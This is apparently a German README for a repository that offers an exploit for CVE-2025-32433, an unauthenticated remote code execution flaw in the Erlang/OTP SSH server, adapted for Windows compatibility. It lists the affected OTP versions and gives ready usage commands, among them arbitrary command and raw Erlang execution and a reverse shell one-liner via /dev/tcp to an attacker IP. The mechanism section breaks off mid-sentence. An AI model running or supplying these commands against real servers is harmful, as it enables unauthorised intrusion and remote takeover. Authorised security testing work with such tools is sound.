
Basiert auf der Originalversion:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Ersetzen Sie das Unicode-Häkchen durch ein ASCII-Zeichen für Windows-Kompatibilität
Erlang/OTP SSH – Nicht authentifizierte Remote-Codeausführung
Dieses Repository enthält einen Exploit für CVE-2025-32433, eine kritische Schwachstelle für nicht authentifizierte Remote-Codeausführung im Erlang/OTP SSH-Server.
Hauptmerkmale:
CVE-ID: CVE-2025-32433
Schweregrad: Kritisch
Auswirkung: Nicht authentifizierte Remote-Codeausführung
Die Schwachstelle ermöglicht es Angreifern, ohne Authentifizierung beliebige Systembefehle auf Erlang/OTP SSH-Servern auszuführen, indem sie speziell gestaltete SSH-Protokollnachrichten senden.
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"
# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
-t, --target Ziel-IP-Adresse (Standard: 127.0.0.1)
-p, --port Ziel-Port (Standard: 2222)
-c, --command Auszuführender Systembefehl
-e, --erlang Auszuführender roher Erlang-Code
Diese Version behebt das Kodierungsproblem des ursprünglichen Exploits:
Problem: Der ursprüngliche Exploit verwendete das Unicode-Häkchenzeichen (✓, U+2713), was zu GBK-Kodierungsfehlern unter Windows führt:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
Lösung: Ersetzte das Unicode-Zeichen durch das standard ASCII + Zeichen für plattformübergreifende Kompatibilität.
Der Exploit funktioniert durch:
os:cmd()Dieser Exploit wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie ihn verantwortungsvoll und nur auf Systemen, für die Sie die ausdrückliche Erlaubnis zum Testen haben.
MIT-Lizenz
Modifiziert für Windows-Kompatibilität von chuzouX